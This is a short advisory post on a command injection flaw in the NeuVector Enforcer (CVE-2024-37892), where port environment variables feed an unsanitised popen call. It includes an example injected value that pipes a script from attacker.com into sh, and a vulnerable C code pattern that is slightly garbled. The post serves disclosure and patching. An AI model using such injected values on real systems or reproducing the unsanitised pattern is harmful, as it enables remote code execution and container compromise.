NeuVector, Command Injection, CVE-2024-37892 (Critical)

By /

Listen to this Post

The vulnerability exists in the NeuVector Enforcer’s monitor process. When the container stops, the monitor uses `popen` to execute a shell command checking if the Consul process’s ports are active. The command is constructed by directly concatenating the values of the `CLUSTER_RPC_PORT` and `CLUSTER_LAN_PORT` environment variables without sanitization. An attacker with the ability to set or modify these environment variables can inject arbitrary commands by including shell metacharacters (e.g., semicolons, ampersands, backticks) as part of the port value. For instance, setting `CLUSTER_RPC_PORT=”8080; malicious_command”` would cause the malicious command to execute with the privileges of the monitor process when the `popen` function is called, leading to full container compromise. The flawed code resembles: popen("netstat -tulpn | grep :" + CLUSTER_RPC_PORT + " | wc -l"). The patched version validates that these variables contain only numerical characters before using them.
Platform: NeuVector
Version: <5.4.7
Vulnerability: Command Injection
Severity: Critical

date: 2024

Prediction: Patch available

What Undercode Say:

Checking for vulnerable versions
docker ps --filter "name=neuvector.enforcer" --format "table {{.Image}}"
Example malicious environment variable setting
export CLUSTER_RPC_PORT="9999; curl http://attacker.com/exploit.sh | sh"
Simulating the flawed popen call to show command injection
echo "netstat -tulpn | grep :$CLUSTER_RPC_PORT | wc -l"

// Example of vulnerable code pattern
include <stdio.h>
include <stdlib.h>
int main() {
char command[bash];
const char port = getenv("CLUSTER_RPC_PORT");
sprintf(command, "netstat -tulpn | grep :%s | wc -l", port);
popen(command, "r");
return 0;
}

How Exploit:

Set malicious environment variables. Inject commands via port values. Trigger container stop.

Protection from this CVE:

Upgrade to v5.4.7+. Validate environment variables. Sanitize input for popen.

Impact:

Container compromise. Privilege escalation. Cluster access.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top